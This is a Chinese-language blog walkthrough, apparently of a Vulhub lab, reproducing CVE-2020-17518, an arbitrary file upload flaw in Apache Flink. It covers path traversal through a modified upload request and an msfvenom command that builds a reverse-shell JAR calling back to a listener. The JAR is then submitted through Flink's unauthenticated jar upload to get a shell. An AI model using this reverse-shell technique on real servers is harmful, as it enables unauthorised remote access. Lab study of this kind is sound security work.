Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式数据流引擎。

Apache Flink****任意文件上传漏洞(CVE-2020-17518)

Apache Flink 1.5.1引入了REST处理程序,由于功能上存在缺陷,攻击者可以通过修改HTTP HEADER将恶意文件写入到本地文件系统上的任意位置,并可通过Flink 访问。

影响范围:

Apache Flink 1.5.1-1.11.2

复现流程

上传文件进行抓包,更改上传路径,

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

要看目录有没有上传成功,需要进行某些操作

docker ps查看进程id

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

docker exec -it 6ddef1bcfa56 /bin/bash

cd /tmp别管有没有tmp文件夹,cd就对了

然后ls,查看有没有上传成功

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

终于在../../../../../../tmp/succes上传成功

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

此外,flink 本身是没有鉴权的,并且它本身支持任意jar包上传并执行,所以可以通过上传jar包getshell

生成java执行木马

msfvenom -p java/shell_reverse_tcp LHOST=192.168.106.138 LPORT=1234 -f jar -o a.jar

然后上传

设置并启用监听

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

上传成功之后,点击submit运行

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

获取shell了

Vulhub-4.Apache Flink任意文件上传漏洞(CVE-2020-17518)

防御措施

更新版本

上一篇:thinkphp5的生命周期


下一篇:vulhub->driftingblues-1靶机渗透测试